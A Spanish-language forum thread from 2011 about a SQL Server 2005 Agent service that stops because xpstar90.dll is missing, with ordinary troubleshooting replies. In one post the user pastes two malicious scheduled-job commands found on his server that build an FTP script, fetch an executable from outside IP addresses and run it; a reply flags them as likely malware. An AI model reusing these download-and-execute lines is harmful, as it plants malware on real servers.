Foros del Web » Programación para mayores de 30 ;) » Bases de Datos General » SQL Server »

El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y despues...

Estas en el tema de El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y despues... en el foro de SQL Server en Foros del Web. colaboradores del foro buen dia. Estoy con un problema, no arranca el Agente, tengo SQL Server 2005 workgroup. Al intentar iniciarlo el mensaje es el ...
  #1 (permalink)  
Antiguo 17/08/2011, 11:55
Avatar de usuariobaneado  
Fecha de Ingreso: diciembre-2007
Mensajes: 402
Antigüedad: 16 años, 2 meses
Puntos: 5
Sonrisa El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y despues...

colaboradores del foro buen dia. Estoy con un problema, no arranca el Agente, tengo SQL Server 2005 workgroup. Al intentar iniciarlo el mensaje es el siguiente:

El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y despues se detuvo. Algunos servicios se detienen automaticamente si no son usados por ningun servicio o programa.

Me fui al log del Agente SQL y se registra lo siguiente:

Error de Sql server: 17750 no se pudo cargar la dll xpstar90.dll Motivo: 126(No se puede encontrar el módulo especificado.). [SQLSTATE 42000]

Como es lo lógico estuve buscando en google acerca del problema, se indica que no está habilitado el usuario NT AUTHORITY\SYSTEM. Si alguien sabe, me indique como habilitarlo para probar si ese es el problema.

Por otra parte, veo que el problema de que no es solo problema del agente, pues en internet he visto post que indican el mismo problema pero con el servicio MSSQLSERVER, mysql y oracle, que se inicio pero se detuvo. Supongo que mas que problema de sql server es una cuestión relacionada con windows. Anteriormente me pasó el mismo caso con el servicio MSSQLSERVER, pero era en un windows xp el cual restauré sistema y se arregló, pero en windows server en un servidor en producción no es tan viable restaurar sistema.

Tengo sql server 2005 workgroup y windows server 2003. Si alguien ha pasado por esto, por favor ayudar.
__________________
Yo quiero ser el pelucón del barrio
  #2 (permalink)  
Antiguo 17/08/2011, 13:09
 
Fecha de Ingreso: octubre-2010
Ubicación: Palermo
Mensajes: 55
Antigüedad: 13 años, 4 meses
Puntos: 0
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Te consulto, ese servidor se quito de algun dominio o se unió a uno?.

Gustavo
  #3 (permalink)  
Antiguo 17/08/2011, 14:21
Avatar de iislas
Colaborador
 
Fecha de Ingreso: julio-2007
Ubicación: Mexico, D.F.
Mensajes: 6.482
Antigüedad: 16 años, 8 meses
Puntos: 180
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Revisa con que cuenta o usuario se esta arrancando el servicio de AGENT
__________________
MCTS Isaias Islas
  #4 (permalink)  
Antiguo 18/08/2011, 15:33
Avatar de usuariobaneado  
Fecha de Ingreso: diciembre-2007
Mensajes: 402
Antigüedad: 16 años, 2 meses
Puntos: 5
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Muchas gracias por la colaboracion. Contestando, el servidor no se ha cambiado de dominio, simplemente dejó de funcionar el agente.

El agente se inicia con el usuario Sistema Local.

Le cambié la cuenta de inicio de sesion, le puse Administrador y su password, le di clic en iniciar y al parecer inició pero inmediatamente volvió a salir el mensaje que el servicio se detuvo porque no tenia nada que hacer.

Alguna sugerencia
__________________
Yo quiero ser el pelucón del barrio
  #5 (permalink)  
Antiguo 18/08/2011, 21:11
Avatar de iislas
Colaborador
 
Fecha de Ingreso: julio-2007
Ubicación: Mexico, D.F.
Mensajes: 6.482
Antigüedad: 16 años, 8 meses
Puntos: 180
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Dudo mucho que nos estes entregando la informacion del MENSAJE DE ERROR, ¿puedes dar el mensaje textualmente como sale?
__________________
MCTS Isaias Islas
  #6 (permalink)  
Antiguo 19/08/2011, 08:12
Avatar de usuariobaneado  
Fecha de Ingreso: diciembre-2007
Mensajes: 402
Antigüedad: 16 años, 2 meses
Puntos: 5
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Disculpa Islas, ayer cuando contesté lo hice desde el teléfono y escribí el mensaje como lo recordaba.

El mensaje exacto que sale al iniciar el agente al cambiar la cuenta de inicio de sesión del servicio a Administrador es el mismo que me sale al intentar iniciar el servicio con el usuario Sistema Local:

El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y despues se detuvo. Algunos servicios se detienen automaticamente si no son usados por ningun servicio o programa.
__________________
Yo quiero ser el pelucón del barrio
  #7 (permalink)  
Antiguo 19/08/2011, 08:41
Avatar de usuariobaneado  
Fecha de Ingreso: diciembre-2007
Mensajes: 402
Antigüedad: 16 años, 2 meses
Puntos: 5
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Le metí un poco mas de cabeza para proporcionar mayor información.

Adjunto imagen del error al iniciar el agente:

[IMG] Uploaded with ImageShack.us[/IMG]

Por otra parte, el SQLAGENT.OUT indica:

2011-08-19 09:32:39 - ! [298] Error de SQLServer: 17750, No se pudo cargar la DLL xpstar90.dll o una de las DLL a las que hace referencia. Motivo: 126(No se puede encontrar el módulo especificado.). [SQLSTATE 42000] (ConnCacheSubsystems)
2011-08-19 09:32:39 - ! [449] No se pudieron enumerar los subsistemas (motivo: No se pudo cargar la DLL xpstar90.dll o una de las DLL a las que hace referencia. Motivo: 126(No se puede encontrar el módulo especificado.). [SQLSTATE 42000] (Error 17750))
2011-08-19 09:32:39 - ? [432] Hay 0 subsistemas en la caché de subsistemas
2011-08-19 09:32:39 - ! [000] No se pudo cargar ningún subsistema. Compruebe el registro de errores para obtener detalles.
2011-08-19 09:32:39 - ? [098] SQLServerAgent terminado (normal)
__________________
Yo quiero ser el pelucón del barrio
  #8 (permalink)  
Antiguo 19/08/2011, 11:33
Avatar de iislas
Colaborador
 
Fecha de Ingreso: julio-2007
Ubicación: Mexico, D.F.
Mensajes: 6.482
Antigüedad: 16 años, 8 meses
Puntos: 180
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Debes verificar que la libreria xpstar90.dll, este en la ruta de instalacion, de no ser asi, debes recuperarla de tu CD de instalacion y copiarla a la ruta de instalacion y ejecutar:

sp_configure 'show advanced options', 1;
GO

RECONFIGURE;
GO

sp_configure 'Agent XPs', 1;
GO

RECONFIGURE
GO
__________________
MCTS Isaias Islas
  #9 (permalink)  
Antiguo 19/08/2011, 13:46
Avatar de usuariobaneado  
Fecha de Ingreso: diciembre-2007
Mensajes: 402
Antigüedad: 16 años, 2 meses
Puntos: 5
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Efectivamente, en la ruta: C:\Archivos de programa\Microsoft SQL Server\MSSQL.1\MSSQL\Binn debería de estar esa dll, la copie de otro servidor. Luego me salió que faltaba la dll xplog70.dll que también la copié de otro servidor que también tien sql server.

Mandé a reiniciar el servidor mssqlserver y el agente e inició el servicio. Ahora mi tema es averiguar porque se eliminaron esas dll.

Al iniciar el servicio del agente se habían creado dos tareas programadas, la primera llamada 1.exe contenía un solo paso que tenía el siguiente código:

cmd /c echo open 61.160.194.33>c:\RECYCLER\zy1.exe&echo 123>>c:\RECYCLER\zy1.exe&echo 123>>c:\RECYCLER\zy1.exe&echo get 1.exe c:\RECYCLER\st1.exe>>c:\RECYCLER\zy1.exe&echo bye>>c:\RECYCLER\zy1.exe&ftp -s:c:\RECYCLER\zy1.exe&if EXIST c:\RECYCLER\st1.exe (start c:\RECYCLER\st1.exe)&del c:\RECYCLER\zy1.exe&exit

Además una segunda tarea programada llamada vb que contenía lo siguiente:

cmd /c echo open 124.232.165.22>c:\zy555.exe&echo sa>>c:\zy555.exe&echo sa>>c:\zy555.exe&echo get 555.exe c:\st555.exe>>c:\zy555.exe&echo bye>>c:\zy555.exe&ftp -s:c:\zy555.exe&if EXIST c:\st555.exe (start c:\st555.exe)&del c:\zy555.exe&exit

No se que habrá pasado, eliminé esas dos tareas.
__________________
Yo quiero ser el pelucón del barrio
  #10 (permalink)  
Antiguo 19/08/2011, 18:27
Avatar de matanga  
Fecha de Ingreso: octubre-2007
Ubicación: España
Mensajes: 1.091
Antigüedad: 16 años, 4 meses
Puntos: 85
Respuesta: El servicio Agente SQL Server (MSSQLSERVER) se inició en el Equipo Local y

Los ficheros zy1.exe y 555.exe parecen ser algún tipo de virus, también es posible que un antivirus sea el responsable de eliminar las dll del agente por estar infectadas, puedes revisar si existe algún log de cuarentena. Antes que nada, es recomendado hacer un backup completo de las bases de datos (lógico, no físico) y cualquier otra cosa importante del servidor.

Saludos

Etiquetas: agente, equipo, local, server, servicio, sql
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 03:02.